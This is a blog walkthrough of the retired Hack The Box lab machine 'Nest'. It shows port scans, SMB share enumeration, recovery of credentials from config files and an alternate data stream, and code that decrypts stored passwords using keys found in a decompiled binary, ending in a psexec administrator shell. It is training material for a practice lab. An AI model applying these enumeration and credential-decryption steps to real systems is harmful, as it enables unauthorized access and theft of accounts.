This post documents the complete walkthrough of Nest, a retired vulnerable VM created by VbScrub, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Nest is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.178 --rate=700

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-28 08:39:18 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4386/tcp on 10.10.10.178
Discovered open port 445/tcp on 10.10.10.178

4386/tcp looks interesting. I wonder what it it. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p445,4386 -A --reason 10.10.10.178 -oN nmap.txt
...
PORT     STATE SERVICE       REASON          VERSION
445/tcp  open  microsoft-ds? syn-ack ttl 127
4386/tcp open  unknown       syn-ack ttl 127
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=1/28%Time=5E2FF41E%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");

Interesting stuff going on at 4386/tcp but I still don’t know what service is that. Well, since SMB is available, let’s see if there are any file shares worth exploring using smbmap.

# smbmap -H 10.10.10.178 -u guest -R
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        .\Shared\
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 19:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 22:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser

Let’s check out Maintenance Alerts.txt and Welcome Email.txt like so.

# smbclient -Uguest% //10.10.10.178/Data

Enter into the respective folders to get them files. First one.

Maintenance Alerts.txt
There is currently no scheduled maintenance work

And the next one.

Welcome Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

Looks like we have ourselves the first pair of credentials (TempUser:welcome2019)! Time to dig deeper into SMB…

# smbmap -H 10.10.10.178 -u TempUser -p welcome2019 -R
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        .\IT\
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    .
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    Archive
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    Configs
        dr--r--r--                0 Wed Aug  7 22:08:30 2019    Installs
        dr--r--r--                0 Sun Jan 26 00:09:13 2020    Reports
        dr--r--r--                0 Mon Aug  5 22:33:51 2019    Tools
        .\IT\Configs\
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    .
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    ..
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    Adobe
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    Atlas
        dr--r--r--                0 Tue Aug  6 13:27:08 2019    DLink
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    Microsoft
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    NotepadPlusPlus
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    RU Scanner
        dr--r--r--                0 Tue Aug  6 13:27:09 2019    Server Manager
        .\IT\Configs\Adobe\
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    .
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    ..
        -r--r--r--              246 Wed Aug  7 19:20:13 2019    editing.xml
        -r--r--r--                0 Wed Aug  7 19:20:09 2019    Options.txt
        -r--r--r--              258 Wed Aug  7 19:20:09 2019    projects.xml
        -r--r--r--             1274 Wed Aug  7 19:20:09 2019    settings.xml
        .\IT\Configs\Atlas\
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    .
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    ..
        -r--r--r--             1369 Tue Aug  6 11:18:38 2019    Temp.XML
        .\IT\Configs\Microsoft\
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    .
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    ..
        -r--r--r--             4598 Wed Aug  7 19:23:26 2019    Options.xml
        .\IT\Configs\NotepadPlusPlus\
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    .
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    ..
        -r--r--r--             6451 Wed Aug  7 23:01:25 2019    config.xml
        -r--r--r--             2108 Wed Aug  7 23:00:36 2019    shortcuts.xml
        .\IT\Configs\RU Scanner\
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    .
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    ..
        -r--r--r--              270 Thu Aug  8 19:49:37 2019    RU_config.xml
        .\Shared\
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 19:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 22:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 19:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 10:59:25 2019    IT
        Secure$                                                 READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 19:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 10:59:25 2019    IT
        .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        .\TempUser\
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    .
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    ..
        -r--r--r--                0 Wed Aug  7 22:56:02 2019    New Text Document.txt

Indeed. The new credentials opened doors to more readable files. Who knows what we can find from the configuration files?

RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

We have a base64-encoded encrypted password. And this history of opened files in NotepadPlusPlus.

config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>

What do we have when we navigate to //10.10.10.178/Secure$/IT/Carl?

Decrypting that “password” in RU_config.xml

Opening Module1.vb provides us the first clue.

Module1.vb
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}



    End Sub

End Module

Using .NET Fiddler I was able to decrypt the password with the following Visual Basic code.

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1
	Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                            encryptor, _
                                            CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

End Class

	Public Sub Main()		
		Dim password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
		Console.WriteLine(password)
	End Sub

End Module

The password is xRxRxPANCAK3SxRxRx.

Getting user.txt

Indeed, with c.smith’s password we have access to more files, including user.txt.

Users                                                   READ ONLY
        .\
        dr--r--r--                0 Wed Jan 29 02:00:30 2020    .
        dr--r--r--                0 Wed Jan 29 02:00:30 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        .\C.Smith\
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    .
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    ..
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    HQK Reporting
        -r--r--r--               32 Sun Jan 26 07:21:44 2020    user.txt
        .\C.Smith\HQK Reporting\
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    .
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    ..
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    AD Integration Module
        -r--r--r--                0 Thu Aug  8 23:08:16 2019    Debug Mode Password.txt
        -r--r--r--              249 Thu Aug  8 23:09:05 2019    HQK_Config_Backup.xml
        .\C.Smith\HQK Reporting\AD Integration Module\
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    .
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    ..
        -r--r--r--            17408 Wed Aug  7 23:42:49 2019    HqkLdap.exe

Privilege Escalation

All that’s left is the unknown service at 4386/tcp. I was able to connect to the service alright.

One thing to take note is enable CRLF as newline because of hello Microsoft Windows :wink:. Something struck me about the service was the feature to enable debug mode with additional commands.

Besides the user.txt, we also have “Debug Mode Password.txt” above. But it has a size of zero, I hear you asking. Enter the allinfo command in smbclient.

Alternate Data Stream

When you see a file having a size of zero but you know something interesting is going on with that file, chances are the interesting data is stored in an alternate data stream or ADS.

What do we have here? A data stream of 15 bytes? Let’s grab that!

I think we have the DEBUG password.

Indeed.

It didn’t take me long to discover another encrypted password.

Decrypting that “password” in Ldap.conf

Earlier on I had a look at HqkLdap.exe. It’s a .NET executable.

Using dnSpy, one can easily “disassemble” a .NET executable.

Similarly, we can decrypt the password in .NET Fiddler with the following code.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
	// Token: 0x02000007 RID: 7
	public class CR
	{
		// Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
		public static string DS(string EncryptedString)
		{
			if (string.IsNullOrEmpty(EncryptedString))
			{
				return string.Empty;
			}
			return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
		}

		// Token: 0x06000013 RID: 19 RVA: 0x000022B0 File Offset: 0x000006B0
		public static string ES(string PlainString)
		{
			if (string.IsNullOrEmpty(PlainString))
			{
				return string.Empty;
			}
			return CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
		}

		// Token: 0x06000014 RID: 20 RVA: 0x000022E8 File Offset: 0x000006E8
		private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
		{
			byte[] bytes = Encoding.ASCII.GetBytes(initVector);
			byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
			byte[] bytes3 = Encoding.ASCII.GetBytes(plainText);
			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
			byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0)));
			ICryptoTransform transform = new AesCryptoServiceProvider
			{
				Mode = CipherMode.CBC
			}.CreateEncryptor(bytes4, bytes);
			string result;
			using (MemoryStream memoryStream = new MemoryStream())
			{
				using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
				{
					cryptoStream.Write(bytes3, 0, bytes3.Length);
					cryptoStream.FlushFinalBlock();
					byte[] inArray = memoryStream.ToArray();
					memoryStream.Close();
					cryptoStream.Close();
					result = Convert.ToBase64String(inArray);
				}
			}
			return result;
		}

		// Token: 0x06000015 RID: 21 RVA: 0x000023DC File Offset: 0x000007DC
		private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
		{
			byte[] bytes = Encoding.ASCII.GetBytes(initVector);
			byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
			byte[] array = Convert.FromBase64String(cipherText);
			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
			checked
			{
				byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
				ICryptoTransform transform = new AesCryptoServiceProvider
				{
					Mode = CipherMode.CBC
				}.CreateDecryptor(bytes3, bytes);
				MemoryStream memoryStream = new MemoryStream(array);
				CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
				byte[] array2 = new byte[array.Length + 1];
				int count = cryptoStream.Read(array2, 0, array2.Length);
				memoryStream.Close();
				cryptoStream.Close();
				return Encoding.ASCII.GetString(array2, 0, count);
			}
		}

		// Token: 0x04000006 RID: 6
		private const string K = "667912";

		// Token: 0x04000007 RID: 7
		private const string I = "1L1SA61493DRV53Z";

		// Token: 0x04000008 RID: 8
		private const string SA = "1313Rf99";
	}

	public class Program
	{
		public static void Main()
		{
			Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
		}
	}
}

Armed with the administrator’s password (XtH4nkS4Pl4y1nGX), I guess the end is near. We should be able to get a shell with Impacket’s psexec.

Sweet.

Getting root.txt

Time for the prize, yo!

:dancer:

Afterthoughts

Ain’t nobody got time for the unintended way…